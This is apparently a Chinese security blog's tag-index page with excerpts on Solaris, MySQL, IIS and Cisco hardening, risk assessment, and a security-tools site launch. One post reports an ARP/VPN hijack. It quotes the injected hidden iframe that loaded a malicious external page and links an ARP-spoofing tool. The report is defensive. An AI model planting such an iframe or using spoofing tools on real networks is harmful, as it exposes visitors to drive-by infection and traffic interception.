注册 | 登录 | 归档 | 搜索 | 标签 | 评论 | 链接
浏览模式: 标准 | 列表 Tag: 安全

安全观点扯淡

引用luoluo 1、专业安全人员的意义不在于安全人员有专业的安全知识,而是安全人员这个角色从安全的角度出发考虑问题
2、安全的最终目的还是要为业务服务
3、安全工作的关键在于安全管理
4、安全是个持续的过程
5、安全问题的解决一般是涉及跨部门协作,主要的成本在沟通
luoluo同学,总结的很牛X。赞一个。

Tags: 安全, 扯淡

科普Solaris系统安全

科普Solaris系统安全

==维护密码和登录控制
==监控系统使用情况
==限制文件访问
==root用户登录
==控制通过网络的远程访问

前段时间给用户加固就出现了http://www.amxku.net/archives/reinforcement-solaris/,这两天给用户培训这方面,标记一下。个人拙见,有不妥之处还望斧正。

» 阅读全文

Tags: solaris, 安全, 加固, 原创

风险评估杂谈

ENGEE / amxku_at_msn.com

我个人觉得作为一个优秀的服务团队必须具备如下的一下基本要求也是我们尽量要给用户展示的实力。

1 、需要先进的方法论
信息安全风险评估基础是风险量化所有的计算都是数学模型,所以风险评估方法论就显得尤为重要了再好的团队。如果你的方法论错了,那你拥有在先进的技术,其结果一定是错误的。作为一个专业安全服务公司你必须要有自己明确的风险评估方法论,并且提出他的合理性。通俗的讲,就是风险是如何构成,影响风险的要素是什么,我们怎么来取值 最后如何计算等等。如果你能清楚的给用户讲明白一枚银币仍上天空后,所有能影响他掉落的各种因素,并有准确的计算方式那么你即时你告诉用户,这枚硬币仍上去的一刹那我们就已经清楚的知道他落下来后是人头还是字。我相信用户也会被你折服的。否则你就是在扯蛋。

» 阅读全文

Tags: 安全, 杂谈, 风险评估, 方法论, 杂谈, 专业, 原创

Solaris 系统安全加固列表

一、安全理念
1、安全的隐患更多来自于企业内部
2、对于管理员的要求:不要信任任何人
3、分层保护策略:假设某些安全保护层完全失效
4、服务最小化
5、为最坏的情况做打算

二、物理安全
1、记录进出机房的人员名单,考虑安装摄像机
2、审查PROM是否被更换,可以通过记录hostid进行比较
3、每个系统的OpenBoot口令应该不一样,口令方案不可预测
4、系统安装完毕移除CD-ROM
5、将版本介质放入不在本场地的介质储藏室中

» 阅读全文

Tags: solaris, sun, 加固, 安全

Hacker Applications

       小黑软件(Hacker Applications)发布啦!请记住我们:HackApp.com ,先来解释下我们域名的含义,HackApp = Hacker Applications。
       我们的口号是---没有后门!
       经过鬼仔7jdgamxku (排名不分先后,哈哈)的不懈努力,小黑软件(Hacker Applications)终于在今天上线了!
       从10月中旬的开始策划到现在,已经半个多月了,中间可谓是经历了众多坎坷啊,先是从想域名开始,想了几天,域名想好了,程序也搭建好了,名字又想不起来,开始想名字,这一想就是10几天过去了。最后终于决定使用“小黑软件 ”这个名字。
       我们的宗旨是收集、介绍我们认为比较好的、且对大家有用的网络安全相关软件给大家,另外大家有什么好的网络安全相关软件想共享的话,可以直接通过侧边栏的“联系我们”告诉我们。当然,必须是符合我们口号中的要求才可以,那就是“没有后门”!在我们这里,不会发盗号类的木马等。远控类的会发,但是只会发源码公布了的远控。只要是不能保证没有后门的软件,我们都不会发,宁缺毋滥。
       我们也知道,这些说起来容易,但是做起来的话可能会比较难,因为一些好东西,大家都想留着自己用。我们只能尽我们最大的努力来做好,希望大家多多关注我们,多多给予我们帮助,谢谢!

7jdg:共同进步,共同学习,全力打造国内最大的安全软件资讯站,不求做的最好,只求能做的更好,希望大家关注我们,同时也希望大家能共同更新。

amxku:致力于网络安全软件的介绍,创造出最适合中国网络使用者阅读的新闻、评论、观点和专访等,使中国的网络使用者能够和世界其他地方一样,及时了解到当前网络安全相关软件的相关信息,从日新月异的科技信息中获得最大的信息价值。

鬼仔:哈哈,我就不说什么了,上面那些除了7jdg和amxku说的之外,都是我想说的了。

Tags: 小黑软件, 安全, 工具

MySQL一级防范检查列表

以下是加固你的 mysql 服务器安全所要做的工作的重要参考:
Securing mysql: step-by-step
Secure mysql Database Design
Securing Your mysql Installation

• 阅读 mysql 安全指南:

http://dev.mysql.com/doc/mysql/en/Security.html

• 在你的Mysql服务器上配置 IPTables (linux) 或者 IPSec filtering ruleset (Windows)。

» 阅读全文

Tags: mysql, linux, 安全, 加固

虚拟主机C盘权限设置 [IIS] V1.3

amxku<2>msn.com

修正了删除C盘的Everyone的权限
修正了删除的所有的Users的访问权限
添加删除C盘Windows下的所有的危险文件夹
添加删除系统危险文件的访问权限,只留管理组成员
添加注册表相关设定

MD5: f64c295521f8c894999484d80bc4101e

附件: iis.bat [ 14.85 K, 下载次数:225 ]

Tags: 安全, 原创, 虚拟主机, 权限设置

Cisco路由器安全配置方案

1 禁止CDP(cisco Discovery Protocol)。如:
2 禁止其他的TCP、UDP Small服务。
3 禁止Finger服务。
4 建议禁止HTTP服务。
5 禁止BOOTp服务。
6 禁止IP Source Routing。
7 建议如果不需要ARP-Proxy服务则禁止它,路由器默认识开启的。
8禁止IP Directed Broadcast。
9 禁止IP Classless。
10 禁止ICMP协议的IP Unreachables, Redirects, Mask Replies。
11 建议禁止SNMP协议服务。在禁止时必须删除一些SNMP服务的默认配置。如:
12 如果没必要则禁止WINS和DNS服务。
13 明确禁止不使用的端口。

» 阅读全文

Tags: 安全, cisco

木桶新理论与信息安全

benjurry (benjurry_at_xfocus.org)

 说到木桶理论,可谓众所周知:一个由许多块长短不同的木板箍成的木桶,决定其容水量大小的并非是其中最长的那块木板或全部木板长度的平均值,而是取决于其中最短的那块木板。要想提高木桶整体效应,不是增加最长的那块木板的长度,而是要下功夫补齐最短的那块木板的长度。这个理论由谁提出,目前已经无从考究了,但是这个理论的应用范围却是十分广泛,从经济学、企业管理到人力资源到个人发展。
同样这个理论也被引进了安全领域,在信息安全中,认为信息安全的防护强度取决于“马奇诺防线”中最为薄弱的一环,因此出现的一个状况是发现哪个安全问题严重就买什么样的产品。这个理论意义在于使我们认识到整个安全防护中,最短木块的巨大威胁,并针对最短木块进行改进。

» 阅读全文

Tags: 工作, 安全

也被ARP玩了一回

郁闷来着,今天也被ARP玩了一回
本来好好的,突然发现www.sebug.net 主页上有马<iframe src='http://xxx.44986.com/bbs/data/xxx.html' height=2 width=0></iframe> 
郁闷,不太可能吧,不敢相信来着
我立马把站点关闭了。
查了半天没有发现什么问题,代码正常啊
咋回事呢,也没有发现机器不正常。

我用另一台机器开看sebug.net是正常的。难道是传说中的ARP会话截持。我是用路由拔号的,内网就两台机器,另一台还没开机呢,也没可能啊。而且我在另一台机器上打开网站也是正常的,没有被截持。我自己的机器打开红狼等很多网站都出现这样的情况,现在确定是被截持了。还是没有找到问题所在。问了几个朋友,无语。

我把所有的东东都关了,什么QQ,MSN……,晕,还是不行,VPN还没有断开,断开试试

VPN一断开,好了,晕,难道是VPN的IP被截持了,再连接上VPN又被截持了。试了几次,一样的情况
是VPN被截持了

有朋友用61.152.91.2这个VPN的,先别用了吧

ARP,牛……

在NEEAO那找到一个ARP的东东,好像可能实现这样的功能

附件: zxarps.rar [ 10.63 K, 下载次数:330 ]

Tags: 技术, 安全

Records:311234